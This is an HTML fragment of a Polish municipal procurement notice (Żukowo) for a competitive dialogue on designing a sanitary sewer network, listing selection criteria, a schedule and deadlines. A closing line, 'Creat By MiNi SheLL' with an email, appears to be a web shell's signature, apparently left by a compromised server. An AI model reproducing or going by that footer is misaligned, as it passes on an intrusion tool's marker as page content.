W przypadku doświadczenia projektanta liczy się każdy zakończony rok liczony do terminu składania wniosków, czyli do  listopada 2016 r. włącznie. Przy doświadczeniu będzie brany pod uwagę okres po uzyskaniu uprawnień budowlanych do projektowania bez ograniczeń.
2.2)	za zaprojektowanie więcej niż  jednej sieci kanalizacji sanitarnej o długości powyżej 10000 m w ciągu ostatnich pięciu lat przed upływem terminu składania wniosków  po 1 pkt za każdy projekt, ale nie więcej niż 5 pkt.
2.	Zamawiający dokona zsumowania punktów otrzymanych łącznie w kryteriach selekcji opisanych w pkt 1. W przypadku doświadczenia będą  brane pod uwagę wyłącznie zamówienia zrealizowane przez wykonawcę (zamawiający nie będzie przyznawał punktów w przypadku posługiwania się doświadczeniem innych podmiotów w celu potwierdzenia spełnienia warunków). W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia zamawiający będzie brał pod uwagę wyłącznie zamówienia zrealizowane przez lidera. 
3.	W przypadku gdy nie będzie można dokonać zakwalifikowania trzech wykonawców z uwagi na to że dwóch lub więcej wykonawców uzyska taką samą ilość punktów, zamawiający będzie brał pod uwagę łączną długość zaprojektowanej sieci kanalizacyjnej sanitarnej w ramach dokumentacji projektowych, które zostały zatwierdzone pozwoleniem na budowę. Pod uwagę będą brane tylko sieci kanalizacji sanitarnej o długości powyżej 5000 m i które zostały ocenione wg kryterium opisanego w  pkt 1 ppkt 1.2.
4.	W przypadku, gdy liczba wykonawców, którzy złożą  wnioski o dopuszczenie do udziału w dialogu konkurencyjnym i spełnią warunki udziału w postępowaniu będzie równa lub mniejsza niż trzy   zaproszenie do dialogu otrzymają  wszyscy wykonawcy.  

</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td></td></tr><tr><td>Okres rękojmi</td><td></td></tr><tr><td>Termin realizacji</td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />Opis potrzeb i wymagań zamawiającego (OPiWZ)wraz z opisem przedmiotu zamówienia (OPZ) i pozostałymi załącznikami są dostępne pod adresem http://bip.zukowo.pl/Article/id,2041.html. 
Wykonawcy zainteresowani udziałem w postępowaniu powinni ze wskazanej strony internetowej zamawiającego pobrać i wypełnić:
1)	Formularz wniosku o dopuszczenie do udziału w dialogu (WNIOSEK)	- Załącznik nr 2;
2)	Oświadczenia 	-	Załącznik nr 3;
3)	Oświadczenie  grupa kapitałowa - Załącznik nr 4;
4)	Wykaz usług - Załącznik nr 5;
5)	Wykaz osób  do realizacji zamówienia  - Załącznik nr 6;
6)	Dostępność oświadczeń i dokumentów - Załącznik nr 7;
7)	Zobowiązanie 	- Załącznik nr 8. 
Załączniki nr 7 i nr 8 wykonawca składa tylko w sytuacji kiedy jego dotyczą. 
Wykonawca może złożyć wniosek oraz pozostałe oświadczenia i wykazy na innych formularzach niż udostępnione przez zamawiającego pod warunkiem, że zakres informacji i oświadczeń będzie odpowiadał treści i zakresowi wskazanemu w formularzach zamawiającego. 
 <br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br />Zamawiający nie przewiduje nagród dla wykonawców, którzy przedstawią rozwiązania stanowiące podstawę do składania ofert. <br />
              Wstępny harmonogram postępowania:
              <br />Postępowanie będzie prowadzone wg następującego harmonogramu:
1)	Ogłoszenie o zamówieniu  publikacja ogłoszenia w Biuletynie Zamówień Publicznych. W tym samym dniu na stronie internetowej zamawiającego   http://bip.zukowo.pl/  zostanie udostępniony OPIS  POTRZEB  I  WYMAGAŃ  ZAMAWIAJĄCEGO wraz z formularzem WNIOSKU (Załącznik nr 2 do OPiWZ).
2)	Złożenie wniosków o dopuszczenie do udziału w dialogu przez wykonawców.
3)	Ocena spełnienia przez wykonawców warunków udziału w postępowaniu i ustalenie rankingu wykonawców na podstawie kryteriów selekcji.
4)	Poinformowanie wykonawców o otrzymanych ocenach.
5)	Zaproszenie do dialogu wykonawców, którzy  zostali najwyżej ocenieni. W zaproszeniu zostanie podana informacja o miejscu i terminie rozpoczęcia dialogu. 
6)	Prowadzenie przez zamawiającego dialogu z wykonawcami.
7)	Poinformowanie wykonawców o zakończeniu dialogu. 
8)	Opracowanie przez zamawiającego specyfikacji istotnych warunków zamówienia (SIWZ).
9)	Zaproszenie wykonawców do złożenia ofert oraz podanie informacji o dostępności SIWZ. W zaproszeniu zostanie podany termin i miejsce składania ofert. Zamawiający będzie wymagał wniesienia wadium.
10)	Dokonanie wyboru najkorzystniejszej oferty przez zamawiającego.
11)	Negocjacje ostatecznych warunków umowy z wykonawcą, którego oferta została wybrana jako najkorzystniejsza. 
<br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br />1.	Wykonawca w terminie 3 dni od dnia przekazania informacji o wynikach oceny spełnienia warunków udziału w postępowaniu i otrzymanych ocenach spełnienia tych warunków (art. 60d ust. 1 ustawy PZP), przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Oświadczenie stanowi Załącznik nr 4 do OPiWZ.
2. Zamawiający nie przewiduje publicznego otwarcia wniosków.
3. Zamawiający dopuszcza zmianę w kolejności kryteriów oceny ofert w stosunku do kolejności podanej w ogłoszeniu w przypadku jeżeli taka zmiana będzie zasadna po przeprowadzeniu dialogu.  
4. Zamawiający będzie wymagał wniesienia zabezpieczenia należytego wykonania umowy od wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.<br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian zostaną opisane w specyfikacji istotnych warunków  zamówienia (SIWZ), która będzie stanowiła załącznik do zaproszenia do składania ofert. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/11/2016, godzina: 14:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b><br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Spółki cywilne będą traktowane jako wykonawcy wspólnie ubiegający się o zamówienie.  2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie - Załącznik
nr 3 do OPiWZ, składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to ma
potwierdzać spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia w zakresie, w którym każdy z
wykonawców wykazuje spełnianie warunków udziału w postępowaniu, brak podstaw wykluczenia. </div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com